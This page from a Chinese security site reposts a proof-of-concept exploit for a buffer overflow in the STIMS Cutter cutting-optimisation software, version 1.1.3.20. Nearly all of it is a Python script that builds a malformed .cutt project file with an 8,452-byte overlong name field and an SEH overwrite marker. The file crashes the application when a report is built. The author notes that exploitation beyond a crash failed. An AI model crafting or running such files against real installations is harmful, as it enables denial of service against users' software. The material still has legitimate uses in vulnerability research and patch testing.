首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 STIMS Cutter - Buffer Overflow DoS 来源：ishitasailor@gmail.com 作者：Khandelwal 发布时间：2016-02-22   # Exploit Title: STIMS CUTTER OVERFLOW SEH OVERWRITE # Date: 19 Feb 2016 # Exploit Author: Shantanu Khandelwal <shantanu561993@gmail.com <ishitasailor@gmail.com>> # Vendor Homepage: http://www.stimslabs.com/ # Software Link: http://www.stimslabs.com/en/cutter/STIMSCutterEnSetup.exe # Version: 1.1.3.20 # Tested on: Windows XP SP3 # CVE : UNKNOWN # ==============HOW TO CRASH ================== #make the cutt file and open it it the STIMS Cutter application. #Click on Build Report #=========================================== #Problems in exploitation #Unable to find suitable SEH pointer #     #!/usr/bin/env python f=open("crash.cutt","w")   payload = """<!--block:#solution--> [solution] name=""" payload+="A"*8452 payload +="BBBB" #SEH overwrite payload +="""CCCC desc=A time=0 version=1 file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt time.created=131003117142810000 app=1.1.3 projects=1 <!--#solution:block--> <!--block:A--> [properties] optimize=0 level=0 diversity=0 status=0 active=1 remnants=0 sort=0 version=1 desc=S comment= comment.active=0 notes= notes.active=0 material=A progress=100 calculation=0D99FF12 cost=222.000 time.gone=0 time.date=2016 Feb 18 23.29.14 payload=2 file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt app=1.1.3   [order.blanks] b001={ "uid": "908113387", "material": "A", "length": "222", "quantity": "1", "knife": "1", "indent": "11", "cost": "1.0", "comment": "1", "id": "1", "name": "a" }   [order.pieces] p001={ "uid": "124270241", "material": "A", "length": "111", "quantity": "1", "label": "1", "comment": "1", "id": "1", "name": "a", "orphans": "0" }   [layout.summary] summary={ "output": "112.000", "used.len": "222.000", "used": "1", "pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "remnants": "0.000", "srest": "110.000", "cost": "222.000", "cost.ppu": "1.982", "brest": "110.0", "status": "", "type": "summary", "time.gone": "0", "time.date": "2016 Feb 18 23.29.14" } blank01={ "name": "a", "cost": "1.000000", "blank": "1", "used": "1", "pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "output": "112.000", "used.len": "222.000", "cost.sum": "222.000", "cost.ppu": "1.982", "remnants": "0.000" }   [layout.cuttings] c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1", "shifts": "1", "output": "#1 1", "layout": "111" }   [layout.cuttings.parts] c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1", "shifts": "1", "output": "#1 1", "layout": "111", "name": "1" } <!--A:block--> """   f.write(payload) f.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·STIMS Buffer - Buffer Overflow ·QuickHeal 16.00 - webssx.sys D ·XM Easy Personal FTP Server 5. ·Adobe Cross Site Scripting / O ·Inductive Automation Ignition ·Core FTP Server 1.2 - Buffer O ·Inductive Automation Ignition ·libquicktime 1.2.4 - Integer O ·Network Scanner Version 4.0.0. ·Linux io_submit L2TP Sendmsg I ·Microsoft Windows - AFD.SYS Da ·Proxmox VE 3/4 Insecure Hostna   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved